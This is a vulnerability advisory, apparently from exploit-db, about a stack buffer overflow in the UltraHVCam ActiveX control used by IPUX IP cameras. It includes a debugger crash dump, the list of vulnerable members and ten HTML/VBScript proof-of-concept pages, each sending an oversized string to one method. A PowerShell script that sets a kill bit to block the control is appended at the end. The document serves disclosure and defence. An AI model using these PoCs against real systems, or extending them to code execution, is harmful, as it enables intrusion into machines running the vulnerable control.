IPUX CS7522/CS2330/CS2030 IP Camera – ‘UltraHVCamX.ocx’ ActiveX Stack Buffer Overflow

  • Author: LiquidWorm
    Date: 2014-12-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35422/
  • 
    IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
    
    
    Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
    Product web page: http://www.ipux.net | http://www.fitivision.com
    Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
    Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
    Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
    
    Summary: The device is an H.264 wired/wireless IP camera with a 1.3-megapixel sensor.
    With high-performance H.264 video compression, the file size of the video stream is
    greatly reduced, optimizing network bandwidth efficiency. It has full pan/tilt
    function and a 3X digital zoom feature for monitoring larger spaces. The built-in
    USB port provides a convenient and portable option for local storage of event and
    schedule recordings, especially when the network is disconnected.
    
    Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
    overflow vulnerability when a large number of bytes is passed to several functions
    in UltraHVCamLib, resulting in memory corruption that overwrites several registers
    and the structured exception handler (SEH). An attacker can gain access to the
    system of the affected node and execute arbitrary code.
    
    ----------------------------------------------------------------------------------
    
    (4b24.478c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx - 
    eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
    eip=10032459 esp=0030efe8 ebp=0030efec iopl=0         nv up ei pl nz na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    UltraHVCamX!DllUnregisterServer+0x100e9:
    10032459 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=????????
    0:000> d ecx
    41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    0:000> d eax
    02d04d4f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04d5f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04d6f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04d7f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04d8f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04d9f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04daf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    02d04dbf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    
    ----------------------------------------------------------------------------------
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
    
    
    Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2014-5212
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
    
    
    16.11.2014
    
    ---
    
    
    Properties:
    -----------
    
    FileDescription		UltraHVCam ActiveX Control
    FileVersion		1, 0, 52, 55 and 1, 0, 52, 54
    InternalName		UltraHVCamX
    OriginalFileName	UltraHVCamX.ocx
    ProductName		UltraHVCam device ActiveX Control
    ProductVersion		1, 0, 52, 55 and 1, 0, 52, 54
    
    
    List of members:
    ----------------
    
    Interface IUltraHVCamX : IDispatch
    Default Interface: True
    Members : 66
    	RemoteHost
    	RemotePort
    	AccountCode
    	GetConfigValue
    	SetConfigValue
    	SetCGIAPNAME
    	Password
    	UserName
    	fChgImageSize
    	ImgWidth
    	ImgHeight
    	SnapFileName
    	AVIRecStart
    	SetImgScale
    	OpenFolder
    	OpenFileDlg
    	TriggerStatus
    	AVIRecStatus
    	Event_Frame
    	PlayVideo
    	SetAutoScale
    	Event_Signal
    	WavPlay
    	CGI_ParamGet
    	CGI_ParamSet
    	MulticastEnable
    	MulticastStatus
    	SetPTUserAllow
    	SetLanguage
    	SetZoomButtonFontColor
    	SetZoomButtonColor
    	SetFullScreen
    
    
    Vulnerable members of the class:
    --------------------------------
    
    RemoteHost
    AccountCode
    SetCGIAPNAME
    Password
    UserName
    SnapFileName
    OpenFolder
    CGI_ParamGet
    CGI_ParamSet
    MulticastEnable
    
    
    PoC(s):
    -------
    
    
    ---1
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function MulticastEnable ( ByVal sIP As String ,ByVal lPort As Long ) As Long"
    memberName = "MulticastEnable"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 2
    arg1=String(13332, "A")
    arg2=1
    target.MulticastEnable arg1 ,arg2 
    </script>
    </html>
    
    
    ---2
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let RemoteHost As String"
    memberName = "RemoteHost"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(2068, "A")
    target.RemoteHost = arg1
    </script>
    </html>
    
    
    ---3
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let AccountCode As String"
    memberName = "AccountCode"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.AccountCode = arg1
    </script>
    </html>
    
    
    ---4
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let SetCGIAPNAME As String"
    memberName = "SetCGIAPNAME"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.SetCGIAPNAME = arg1
    </script>
    </html>
    
    
    ---5
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let Password As String"
    memberName = "Password"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.Password = arg1
    </script>
    </html>
    
    
    ---6
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let UserName As String"
    memberName = "UserName"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.UserName = arg1
    </script>
    </html>
    
    
    ---7
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let SnapFileName As String"
    memberName = "SnapFileName"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.SnapFileName = arg1
    </script>
    </html>
    
    
    ---8
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function OpenFolder ( ByVal sInitPath As String ) As String"
    memberName = "OpenFolder"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.OpenFolder arg1 
    </script>
    </html>
    
    
    ---9
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function CGI_ParamGet ( ByVal sGroup As String ,ByVal sName As String ) As String"
    memberName = "CGI_ParamGet"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 2
    arg1=String(1044, "A")
    arg2="defaultV"
    target.CGI_ParamGet arg1 ,arg2 
    </script>
    </html>
    
    
    ---10
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function CGI_ParamSet ( ByVal sGroup As String ,ByVal sName As String ,ByVal SVal As String ) As Long"
    memberName = "CGI_ParamSet"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 3
    arg1=String(1044, "A")
    arg2="defaultV"
    arg3="defaultV"
    target.CGI_ParamSet arg1 ,arg2 ,arg3 
    </script>
    </html>
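
A defensive counterpart to the PoCs above, added here and not part of the original advisory: a PowerShell audit that checks, and optionally sets, the Internet Explorer kill bit for the CLSID the PoCs instantiate. The registry paths and the 0x400 `Compatibility Flags` value are the standard ActiveX kill-bit mechanism; the function names and the `$Apply` switch are hypothetical.

```powershell
# Added example: audit / set the IE kill bit for the UltraHVCamX control.
# The CLSID is the one used in the <object> tags of the PoCs in this advisory.
$Clsid   = '{9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E}'
$KillBit = 0x400                      # kill bit: IE refuses to instantiate the control
$Name    = 'Compatibility Flags'

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so cover both.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {
    param([string]$Root)
    $key   = Join-Path $Root $Clsid
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $prop) { $flags = [int]$prop.$Name }
    }
    [pscustomobject]@{
        Key     = $key
        Flags   = '0x{0:X8}' -f $flags
        Blocked = (($flags -band $KillBit) -ne 0)
    }
}

function Set-KillBit {
    param([string]$Root)
    if (-not (Test-Path -LiteralPath $Root)) { return }   # no Wow6432Node on 32-bit Windows
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    $current = 0
    $prop = Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $prop) { $current = [int]$prop.$Name }
    # OR the bit in so that any flags already present are preserved.
    New-ItemProperty -LiteralPath $key -Name $Name -PropertyType DWord `
        -Value ($current -bor $KillBit) -Force | Out-Null
}

# Audit only by default; set $Apply = $true in an elevated session to write the value.
$Apply = $false
if ($Apply) { $Roots | ForEach-Object { Set-KillBit $_ } }
$Roots | ForEach-Object { Get-KillBitState $_ } | Format-Table -AutoSize
```

With the kill bit set, Internet Explorer no longer loads the control for any page, including the camera's own web interface.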